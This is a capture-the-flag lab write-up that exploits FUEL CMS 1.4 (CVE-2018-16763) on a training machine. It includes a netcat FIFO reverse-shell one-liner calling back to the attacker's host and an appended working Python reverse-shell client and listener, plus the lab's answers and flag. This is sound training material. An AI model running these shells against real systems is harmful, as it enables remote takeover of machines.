
[THM-WriteUp] Vulnerability Capstone

Published 2024/04/12

Task 2: Exploit the Machine (Flag Submission)

What is the name of the application running on the vulnerable machine?

Start with an nmap scan. -A turns on version detection, the default NSE scripts, OS detection and traceroute; the default scripts are what surface the robots.txt entry and the page title below.

root@ip-10-10-163-137:~# nmap -A 10.10.215.220

Starting Nmap 7.60 ( https://nmap.org ) at 2024-04-12 14:48 BST
Stats: 0:00:22 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 0.00% done
Nmap scan report for ip-10-10-215-220.eu-west-1.compute.internal (10.10.215.220)
Host is up (0.00030s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
| http-robots.txt: 1 disallowed entry 
|_/fuel/
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Welcome to FUEL CMS
MAC Address: 02:71:B3:D9:61:29 (Unknown)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.60%E=4%D=4/12%OT=22%CT=1%CU=39888%PV=Y%DS=1%DC=D%G=Y%M=0271B3%T
OS:M=66193BAC%P=x86_64-pc-linux-gnu)SEQ(SP=107%GCD=1%ISR=10A%TI=Z%CI=Z%TS=A
OS:)SEQ(SP=107%GCD=1%ISR=10A%TI=Z%CI=Z%II=I%TS=A)OPS(O1=M2301ST11NW7%O2=M23
OS:01ST11NW7%O3=M2301NNT11NW7%O4=M2301ST11NW7%O5=M2301ST11NW7%O6=M2301ST11)
OS:WIN(W1=F4B3%W2=F4B3%W3=F4B3%W4=F4B3%W5=F4B3%W6=F4B3)ECN(R=Y%DF=Y%T=40%W=
OS:F507%O=M2301NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N
OS:)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0
OS:%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7
OS:(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=
OS:0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.30 ms ip-10-10-215-220.eu-west-1.compute.internal (10.10.215.220)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.68 seconds

Answer

FUEL CMS

What is the version number of this application?

The nmap output does not show the application version; the page title only identifies the product.
Since it is a web application, open it in a browser and look for the version there.

Answer

1.4

What is the number of the CVE that allows an attacker to remotely execute code on this application?

Search Exploit-DB (the go-to source) for FUEL CMS 1.4 and pick the remote code execution entry.

Answer

CVE-2018-16763

What is the value of the flag located on this vulnerable machine? This is located in /home/ubuntu on the vulnerable machine.

Use the exploit found above (Exploit-DB 50477.py) as-is.

Note: start a netcat listener beforehand, otherwise the callback from the target has nothing to connect to.

root@ip-10-10-163-137:~# nc -lvp 4444
root@ip-10-10-163-137:~# python3 50477.py -u http://10.10.215.220
[+]Connecting...
Enter Command $rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.163.137 4444 >/tmp/f     

Reverse shell obtained.

root@ip-10-10-163-137:~# nc -lvp 4444
Listening on [0.0.0.0] (family 0, port 4444)
Connection from ip-10-10-215-220.eu-west-1.compute.internal 58230 received!
/bin/sh: 0: can't access tty; job control turned off
$ pwd
/var/www/html/fuelcms
$ cd /home/ubuntu
$ pwd
/home/ubuntu
$ ls
flag.txt
$ cat flag.txt
THM{ACKME_BLOG_HACKED}

Answer

THM{ACKME_BLOG_HACKED}
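What the two halves of that step actually do, as an added example that is not part of the original write-up: the listener (nc -lvp 4444) and the FIFO one-liner typed at the exploit's "Enter Command" prompt are reproduced here on loopback in Python. The FIFO in the one-liner only exists to loop nc's output back into sh's stdin; a process that holds the connected socket can hand it to /bin/sh directly as stdin, stdout and stderr, which is what the victim side below does. The attacker address and port (127.0.0.1, an ephemeral port) are stand-ins for 10.10.163.137:4444, and /bin/sh is assumed to exist.

```python
import socket
import subprocess
import threading


def reverse_shell_client(host: str, port: int) -> subprocess.Popen:
    """Victim side. Same effect as the write-up's
    cat /tmp/f | /bin/sh -i 2>&1 | nc HOST PORT > /tmp/f
    but without the FIFO: the socket becomes the shell's stdin, stdout and stderr."""
    sock = socket.create_connection((host, port))
    fd = sock.fileno()
    # No -i, so the output is exactly what the commands print (no prompts).
    proc = subprocess.Popen(["/bin/sh"], stdin=fd, stdout=fd, stderr=fd)
    sock.close()  # the child keeps its own copy of the descriptor
    return proc


def catch_shell_and_run(cmd: str, timeout: float = 5.0) -> str:
    """Attacker side (the nc -lvp step): listen first, accept the callback,
    send one command line, and collect output until the shell exits."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    listener.bind(("127.0.0.1", 0))  # loopback + ephemeral port stand in for 10.10.163.137:4444
    listener.listen(1)
    port = listener.getsockname()[1]

    # The listener is up BEFORE the victim connects back; the order matters just as with nc.
    victim = {}
    t = threading.Thread(
        target=lambda: victim.setdefault("proc", reverse_shell_client("127.0.0.1", port))
    )
    t.start()

    conn, _ = listener.accept()
    conn.settimeout(timeout)
    # "exit" makes sh close the socket so recv() sees EOF instead of hanging.
    conn.sendall(cmd.encode() + b"\nexit\n")
    chunks = []
    try:
        while True:
            data = conn.recv(4096)
            if not data:
                break
            chunks.append(data)
    except socket.timeout:
        pass  # shell still open: return whatever has arrived so far
    conn.close()
    listener.close()
    t.join()
    victim["proc"].wait(timeout=timeout)
    return b"".join(chunks).decode(errors="replace")


if __name__ == "__main__":
    print(catch_shell_and_run("id; pwd"), end="")
```

Two details of the original one-liner map onto this: the leading rm /tmp/f clears a FIFO left by an earlier attempt, and 2>&1 is what makes error output travel back over the same connection (the stderr=fd above).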
